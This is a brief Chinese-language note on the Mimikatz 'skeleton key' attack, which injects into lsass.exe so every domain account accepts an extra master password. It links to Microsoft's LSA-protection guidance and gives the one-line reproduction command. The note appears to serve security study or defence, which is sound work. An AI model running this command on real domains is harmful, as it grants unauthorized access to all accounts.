说明:

对于LSA,微软允许通过修改注册表,从而提供额外的防御,详情可参考如下链接:
https://docs.microsoft.com/zh-cn/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection

原理:

Mimikatz 的misc::skeleton模块可对lsass.exe内存进行注入,使得域内每个账户都有获得一个新的密码,且原密码保持不变,两个密码都能进行登录。

复现操作:

mimikatz.exe “privilege::debug” “misc::skeleton” exit

此时可用mimikatz登录任意域账户